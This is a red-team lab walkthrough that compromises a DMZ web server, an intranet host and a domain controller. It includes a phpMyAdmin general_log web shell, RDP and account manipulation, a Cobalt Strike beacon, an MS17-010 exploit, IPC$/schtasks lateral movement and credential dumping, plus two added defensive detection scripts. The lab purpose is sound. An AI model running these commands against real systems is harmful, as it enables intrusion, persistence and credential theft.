Table of contents
1. Red team target range: intranet penetration
2. Network topology diagram of this experiment
3. Intranet penetration attack process
1. Win7 penetration in DMZ area
1.3 How a remote web shell works
2. Penetration of the intranet office area (host in the domain)
3. Domain environment penetration (domain control)
3.1 The concept of domain environment
3.4 Bringing a host with no outbound access online in CS
3.5 Establishing an IPC$ connection
1. Red team target range: intranet penetration
1. Target machine download
Link: https://pan.baidu.com/s/1LgWAHK3XP2Q9CG6QVdxuw
Extraction code: kiss
Win7 virtual machine login password: hongrisec@2019
2. Network topology diagram of this experiment
In this experiment we cannot penetrate the intranet server or the intranet office area directly, because the attacker's network is not connected to them.
We go through the machines in the DMZ instead. The DMZ machines have some connectivity to the intranet office area, so we use a DMZ host as a pivot (springboard) and reach the office area through a tunnel (DNS, ICMP, SOCKS, HTTP or SSH); the office area in turn has connectivity to the server area, which lets us work our way into the intranet.
One Win7 machine in the DMZ
One Win2003 machine in the intranet office area
One Win2008 machine as the intranet server
Attack machine: Kali with nmap, AntSword and other tools
3. Intranet penetration attack process
Information collection: IP, domain name, subdomains, directories, CDN, whois, language, framework, mailboxes, architecture, organisation structure
Vulnerability exploitation: common classes: SQL injection, XSS, XXE, CSRF, RCE, file upload; middleware: Spring, Struts, fastjson, historical vulnerabilities...
Privilege escalation: escalate to root / administrator privileges
Persistence: install a backdoor on the target so that access is not lost and the target stays under control.
Intranet proxy: build a proxy or tunnel to discover and reach machines inside the intranet.
Intranet collection: local machine information, domain information, credential theft, live host discovery, intranet port scanning.
Intranet vulnerabilities: use tools (MSF, Nessus, nmap) to obtain vulnerability information about the hosts.
Lateral movement: once inside the internal network, the attacker expands access through scanning, brute-forcing, SMB transfers and similar techniques and moves through the compromised environment.
Cross-domain attack: conventional penetration (using web vulnerabilities to obtain permissions across domains), or using known domain hashes for pass-the-hash or ticket attacks.
Trace cleanup: clear system logs, bypass logging, and remove traces of operations.
2. Environment construction
1. Win7 in the DMZ
Win7 virtual machine
This virtual machine acts as the web server and needs two network cards, with the addresses 192.168.52.143 and 192.168.111.128
VMnet3, 192.168.52.0, is the intranet segment
VMnet4, 192.168.111.0, is the public network segment
Open the Win7 VM settings, add a network card, set the adapters to custom, VMnet3 and VMnet4.
Start the Win7 VM and enable the network adapters. Local Area Connection: the first network card
Local Area Connection 4: the second network card
Start the phpStudy environment
2. Intranet office area
Win2k3: configure its network on VMnet3 with the IP set to 192.168.52.141
Win7 can ping Win2k3, which shows the environment works
The attack machine Kali needs two network cards, with VMnet4 as the public network (192.168.111.xxx)
With this configuration Kali can reach Win7 in the DMZ, and Win7 in turn has connectivity to the intranet, which allows further penetration.
Kali pings Win7 at 192.168.111.128 to confirm that the environment is configured correctly
3. Domain control host
Win2008 network card on VMnet3 (192.168.52.xxx)
IP configured as 192.168.52.138
Win7 pings Win2008
Log in to Win7 with the domain user GOD
ping god.org
net user /domain
If you log in as the stu1 user, net user /domain cannot find the domain users; check it under the god user instead
3. Start the attack
1. Win7 penetration in the DMZ
Goal: control this machine through Remote Desktop.
1.1 Information collection:
1. IP, ports, directories, website development language, whois, e-mail, phone numbers, company structure, subdomains...
Known IP address:
1. Scan the ports (nmap)
Several ports are found
Visit port 80
The phpStudy probe is a modified phpinfo page. During development the various server settings are often needed, and "probes" are used to display that configuration.
Discover web resources (dirsearch, Yujian, ...)
1. Scan directories
2. Scan for admin pages
We visit beifen.rar and download the file.
phpinfo.php page
phpMyAdmin page
Use the phpMyAdmin brute-force tool: first copy the site URL into a txt file.
Import that txt file and start brute-forcing:
Username and password are both root; log in to the page
1.2 Information collected
1. Port 80 serves a probe page, which by itself does not seem exploitable.
2. The web system exposes a beifen.rar file
3. The web system exposes a phpinfo page
4. The web system exposes a phpMyAdmin page (database management interface)
1.3 How a remote web shell works
1. A web shell (Trojan) must be written into a file on the server (a one-liner shell, a "big" or "small" shell, a memory shell, an AV-evading shell, and so on).
2. <?php eval($_POST[1]); ?>
3. How does it get written? Through a vulnerability: SQL injection, file upload, a framework vulnerability... it is always written via some flaw.
phpMyAdmin getshell trick
- The phpMyAdmin password was found to be root/root
Writing a shell via phpMyAdmin
general_log is off by default. When it is turned on, every statement the user enters is recorded in the configured log file. If the log file path can be pointed at a file under the web root and PHP code is written into the log, the result is a shell:
# View the current configuration
SHOW VARIABLES LIKE 'general%';
Execute the statement in the SQL tab:
The log is saved as C:\phpStudy\MySQL\data\stu1.log
# Turn the log on and change the log file location
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/l.php';
This path is the phpStudy probe's web root, so the log is now written under the web root, and we can write the Trojan into it and reach it over HTTP
Check the configuration again
# Write the payload into the log
select '<?php eval($_POST[1]); ?>';
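From the defender's side, the two things worth checking after this section are whether general_log has been redirected into the web root and whether the web root contains a PHP code-execution one-liner. The following audit is an added example, not code from the original write-up; the SHOW VARIABLES output and the file contents are constructed samples using the lab's paths.

```python
"""Audit for the general_log webshell-write trick: flag a general_log_file
under the web root and scan files for PHP code-execution one-liners.
Added example; the variable dump and file contents below are constructed."""
import re
from pathlib import PureWindowsPath

# Constructed output of: SHOW VARIABLES LIKE 'general%';  (name<TAB>value)
VARIABLES_OUTPUT = """general_log\tON
general_log_file\tC:/phpStudy/WWW/l.php
"""

# Constructed contents a scanner would read from files in the web root.
SAMPLE_FILES = {
    r"C:\phpStudy\WWW\l.php": "1 Query\tselect '<?php eval($_POST[1]); ?>'\n",
    r"C:\phpStudy\WWW\index.php": "<?php echo 'probe'; ?>\n",
}

# PHP opening tag followed by a function that executes attacker input.
WEBSHELL_RE = re.compile(r"<\?php\s+(eval|assert|system|passthru)\s*\(", re.I)


def parse_variables(text):
    """Turn the tab-separated SHOW VARIABLES dump into a dict."""
    rows = (line.split("\t", 1) for line in text.splitlines() if "\t" in line)
    return {k.strip(): v.strip() for k, v in rows}


def log_inside_webroot(variables, webroot):
    """True when general_log is ON and its file lives under the web root.
    PureWindowsPath normalises '/' vs '\\' and compares case-insensitively."""
    if variables.get("general_log", "OFF").upper() != "ON":
        return False
    log_path = PureWindowsPath(variables.get("general_log_file", ""))
    return PureWindowsPath(webroot) in log_path.parents


def find_webshells(files):
    """Return the paths whose contents carry a PHP code-execution one-liner."""
    return sorted(p for p, body in files.items() if WEBSHELL_RE.search(body))


def audit(variables_text, webroot, files):
    """Combine both checks into a list of human-readable findings."""
    findings = []
    variables = parse_variables(variables_text)
    if log_inside_webroot(variables, webroot):
        findings.append("general_log writes into web root: " + variables["general_log_file"])
    findings += ["webshell pattern in " + p for p in find_webshells(files)]
    return findings


if __name__ == "__main__":
    for line in audit(VARIABLES_OUTPUT, r"C:\phpStudy\WWW", SAMPLE_FILES):
        print(line)
```

Changing general_log_file with SET GLOBAL requires the SUPER privilege, so the matching hardening is to give the web-facing MySQL account a non-default password without SUPER and to keep the MySQL data directory outside the web root.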
Look at the probe page again and the payload appears at the bottom:
AntSword connection:
Enter the IP; the connection password is the 1 from the Trojan we wrote ($_POST[1])
Open a virtual terminal and run whoami to see the user and ipconfig to see the IP
We want to log in to the desktop remotely, so make sure port 3389 is open; the command is as follows:
- open 3389
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net user shows the users
A remote connection to 192.168.111.128 asks for a password
We have two options: 1. change a user's password, 2. add a new user
net user administrator admin@123 # change the password
net user administrator /active:yes # enable the account
net user username password /add # add a new user
The connection keeps hanging,
then this page appears;
click Yes
The Win7 VM shows a remote-connection verification prompt
We reboot the machine from AntSword:
shutdown -r -t 0
After it boots, the remote connection succeeds!
Summary:
The first target machine is down; here we used information collection and vulnerability exploitation.
Information collection: the open ports were scanned from the IP, and through them we found the phpStudy probe and the phpMyAdmin page.
Vulnerability exploitation: wrote a one-liner web shell through phpMyAdmin, connected with AntSword, created a user (or changed a password) for Remote Desktop, and took over the machine in the DMZ.
2. Penetration of the intranet office area (domain-joined host)
We want to enter the intranet. Entering directly does not work because the network is not in the same segment, so we use Win7 as a springboard to reach the domain host Win2003
Pinging Win2003 from the attack machine is of course impossible
From AntSword on Win7, pinging Win2k3 succeeds, which confirms the configuration
After getting a webshell, the machine is usually brought online in CS and MSF (post-exploitation)
MSF is the command-line tool; CS is a graphical front end in the same family
MSF and CS are used because both integrate one-click privilege escalation, proxy setup, tunnelling, scanning and so on
Add a network card on VMnet4 (192.168.111.130) to Kali
Kali pings Win7 (192.168.111.128) to confirm the environment works
2.1 Bringing the host online in CS
1. Start the server in Kali: bash teamserver <kali ip> (192.168.111.130) <password> (123456)
2. Start the client: bash cobaltstrike.sh
The IP is Kali's IP, the port is the server's port 9081 from the previous step, and the password is 123456
3. Create a listener
Add a listener with a name and an uncommon port.
The Trojan connects to the listener, the listener reports back to the server, and the server's content appears on this page.
4. Generate a Trojan
Connect it to the listener kiss
Save it to the desktop and give it a name
5. Upload MSB.exe to Win7 with AntSword
dir shows MSB.exe; run it
Back in Kali the host comes online
Set the session's sleep to 1 so it responds every second
Enter the command line
View the user and addresses: shell whoami, ipconfig
View routing: shell route print
View the ARP table to find the intranet addresses and the target IP
ping 192.168.52.141 (Win2k3) must succeed
2.2 MSF listening port
Add an msf listener in CS
Spawn the session to msf
The meterpreter session arrives! In this way msf has also reached Win7
2.3 Build a SOCKS tunnel
Right-click: Pivoting, SOCKS Server
Set the port to 34456
The tunnel is opened
View the tunnel information
Click Tunnel to generate the command
Copy the generated line:
setg Proxies socks4:192.168.111.130:34456
Run background in msf to return to the console
The msf proxy is set to 192.168.111.130, port 34456
Now our msf can reach the intranet
Check Win2k3 for the EternalBlue (MS17-010) vulnerability
Search result number 3 is the scanner that checks for EternalBlue
use 3 # use result number 3
show options # view the configuration
set rhosts 192.168.52.141 # set the target address
run # run
Win2003 is found to be vulnerable to EternalBlue
Using result 0, ms17_010_eternalblue, the system may be too old for the exploit to run
But result 2 can be used to obtain a cmd shell
View the user: whoami
View the IP address: ipconfig
Summary:
1. Bring the domain-joined host online in CS and MSF
2. Build a SOCKS proxy
3. Control the intranet host Win2003 through MSF over the proxy
3. Domain environment penetration (domain control)
3.1 The concept of a domain environment
Win7: computer name, workgroup and domain
I use a company and a school to explain workgroups and domains
Workgroup: computers are grouped so that administrators can manage them more easily.
For example, a company has 100 people (100 computers) and several departments: HR, Operations, Finance, IT and so on.
What is the disadvantage of this?
There is no discipline and no unified management mechanism.
For example, little K works in IT, but the colleague he likes is in HR, so tomorrow little K simply goes to work in HR.
The manager asks all employees to change their wallpaper to the corporate one and not to install software A, but little K ignores it: he keeps his wallpaper and installs software A anyway.
This is where the concept of a domain comes in
The network administrator in the domain (like a class teacher) provides unified management: the domain controller
Machines in the domain: like employees (students)
On a computer, the administrator decides which wallpaper employees use, which software they may run, when they may shut down, sets password policy, and so on, all centrally.
Grade 1 Class 1 (the "rocket class"): the domain name
Head teacher (leader): the domain controller
Students: the machines in the domain
Note: a computer can only join one domain, just as a student can only be in one class.
A domain can have more than one domain controller, just as a class can have a head teacher and other teachers.
Very important
Local users ("natives"): accounts whose names and passwords are stored on the local machine
Domain users: accounts that join the domain (names and passwords are stored on the domain controller). Enterprises generally join their machines to a domain; home PCs do not
How to find the domain controller and tell whether there is a domain
How does a machine join the domain?
The host's DNS is first pointed at the domain server's IP, the domain name is entered in the computer properties, the domain server's account and password are supplied, and the machine joins the domain.
The domain server can add a user with a password that can then log in to the host.
Win7 DMZ host
GOD\administrator: domain user
STU1\administrator: local user
3.2 Determine the domain
Running shell whoami from the beacon shows the user is god\administrator; at this point we do not know whether god is a domain account. So we run
shell hostname, which returns stu1. A local account would appear as stu1\xxx, so god is presumably a domain account.
Alternatively, the more direct way is shell ipconfig /all, which shows the host name stu1 with the DNS suffix god.org
3.3 Information collection in the domain
Where is the domain controller?
nslookup -type=SRV _ldap._tcp
This shows the domain controller's IP 192.168.52.138 (Win2008), the domain controller's name owa, and the domain name god.org
Query the users in the domain
net user /domain
These users all live on the domain controller
Query the computers in the domain
net group "domain computers" /domain
stu1 is the computer we control
Query the domain controller's name
net group "Domain Controllers" /domain
OWA
3.4 Bringing a host with no outbound access online in CS
Generate a listener
Generate the Trojan file
A Trojan is generated for a host that cannot reach the internet (it comes online through the linked beacon rather than a direct connection)
How does the Trojan get onto the domain controller?
View the domain controller's administrator password
3.5 Establishing an IPC$ connection
The IP and password are those of the domain controller Win2008
shell net use \\192.168.52.138\ipc$ "GODl123" /user:god\administrator
shell net use # view the connections
A connection to the domain controller now exists, which means the two trust each other and files can be transferred.
Check it
Copy the file to the domain controller
copy beacon.exe \\192.168.52.138\c$
Win2008 domain controller host
Create a remote scheduled task
schtasks /create /s 192.168.52.138 /tn test /sc onstart /tr c:\beacon.exe /ru system /f
Run it
schtasks /run /s 192.168.52.138 /i /tn "test"
Connect
connect (link) to the target IP 192.168.52.138
View the domain controller: whoami, ipconfig
Check the passwords (my domain controller Win2008 and the springboard Win7 were set to the same password)
Command: logonpasswords
Drop from SYSTEM to administrator
shell schtasks /create /s 192.168.52.138 /tn test1 /sc onstart /tr c:\beacon.exe /ru administrator /f # create: target IP, task name test1, Trojan beacon.exe, run as administrator
shell schtasks /run /s 192.168.52.138 /i /tn "test1" # run
connect (link) 192.168.52.138
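The chain in 3.5 leaves a recognisable trail on the domain controller: a network logon (event 4624, logon type 3), access to IPC$ and then an administrative share (event 5140), and a scheduled task registered from that same logon session (event 4698). The correlation below is an added example, not from the original write-up; the event records are constructed and simplified (the real events carry these fields under names such as TargetLogonId/SubjectLogonId and ShareName), and the IPs are the lab's.

```python
"""Correlate 4624 -> 5140 (admin share) -> 4698 within one logon session.
Added example; EVENTS is a constructed, simplified sample of Security log records."""
from collections import defaultdict

# Constructed events as seen on the domain controller 192.168.52.138.
EVENTS = [
    {"id": 4624, "t": 100, "logon_id": "0x1a2b3c", "user": "GOD\\administrator",
     "src_ip": "192.168.52.143", "logon_type": 3},
    {"id": 5140, "t": 101, "logon_id": "0x1a2b3c", "share": "\\\\*\\IPC$"},
    {"id": 5140, "t": 105, "logon_id": "0x1a2b3c", "share": "\\\\*\\C$"},
    {"id": 4698, "t": 110, "logon_id": "0x1a2b3c", "task": "\\test",
     "command": "c:\\beacon.exe", "run_as": "SYSTEM"},
    {"id": 4624, "t": 500, "logon_id": "0x4d5e6f", "user": "GOD\\jane",
     "src_ip": "192.168.52.141", "logon_type": 3},
    {"id": 5140, "t": 502, "logon_id": "0x4d5e6f", "share": "\\\\*\\share"},
]

ADMIN_SHARES = {"C$", "ADMIN$"}
WINDOW = 600  # seconds allowed between the network logon and the task creation


def sessions(events):
    """Group events by logon id; the type-3 4624 record opens each session."""
    by_id = defaultdict(lambda: {"logon": None, "shares": set(), "tasks": []})
    for e in sorted(events, key=lambda e: e["t"]):
        s = by_id[e["logon_id"]]
        if e["id"] == 4624 and e.get("logon_type") == 3:
            s["logon"] = e
        elif e["id"] == 5140:
            s["shares"].add(e["share"].rsplit("\\", 1)[-1].upper())
        elif e["id"] == 4698:
            s["tasks"].append(e)
    return by_id


def detect_remote_task_chain(events):
    """One alert per task registered from a network logon session that also
    touched an administrative share, within WINDOW seconds of the logon."""
    alerts = []
    for logon_id, s in sessions(events).items():
        if s["logon"] is None or not (s["shares"] & ADMIN_SHARES):
            continue
        for task in s["tasks"]:
            if task["t"] - s["logon"]["t"] <= WINDOW:
                alerts.append({"logon_id": logon_id, "user": s["logon"]["user"],
                               "src_ip": s["logon"]["src_ip"], "task": task["task"],
                               "command": task["command"], "run_as": task["run_as"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_remote_task_chain(EVENTS):
        print(alert)
```

The second run-as-administrator task in the write-up produces the same pattern, so the rule catches both registrations; auditing of object access and of scheduled task creation must be enabled on the domain controller for 5140 and 4698 to be logged at all.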
3.6 Lateral movement
In fact CS integrates a one-click connection
One-click connection from the domain host to the domain controller
.138 is the domain controller
In this way we reach the domain controller directly
From the domain controller we then control the hosts in the domain
We want to bring Win2k3 (192.168.52.141) online
Win2003 comes online
Summary:
1. Distinguish domain users from local users and collect information in the domain.
2. Use CS to bring a host with no outbound access online: generate the Trojan, check the domain passwords, and establish the IPC$ connection.
3. Lateral movement: moving between the domain controller and the hosts in the domain.